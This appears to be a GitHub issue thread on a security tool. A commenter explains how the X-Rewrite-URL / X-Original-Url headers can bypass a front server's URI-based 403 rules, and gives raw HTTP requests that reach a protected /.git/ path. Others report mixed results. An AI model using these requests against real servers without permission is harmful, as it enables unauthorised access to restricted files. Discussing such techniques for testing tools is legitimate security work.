X-Original-Url / X-Rewrite-Url bypass
rumiljonov opened this issue · comments
Rumiljonov commented
Hey, I think you are using X-Original-Url / X-Rewrite-Url
vector in a wrong way. These headers usually help to bypass front server rules, which are based on URI, but you don't change URI while using these headers.
First, normal request returns 403:
GET /.git/ HTTP/1.1
Host: example.com
This attempt to bypass will return 403 too, because URI hasn't changed and the rule still applies:
GET /.git/ HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/
This one should bypass the restriction:
GET / HTTP/1.1
Host: example.com
X-Rewrite-URL: /.git/
Do Anh commented
Thank you, fixed in new update.
AbdulRahman commented
Hy, I also check this method: but it's home page in code response
ler-exploit commented
Hy, je vérifie aussi cette méthode: mais c'est la page d'accueil en réponse de code
i have the same problem, did you fix it??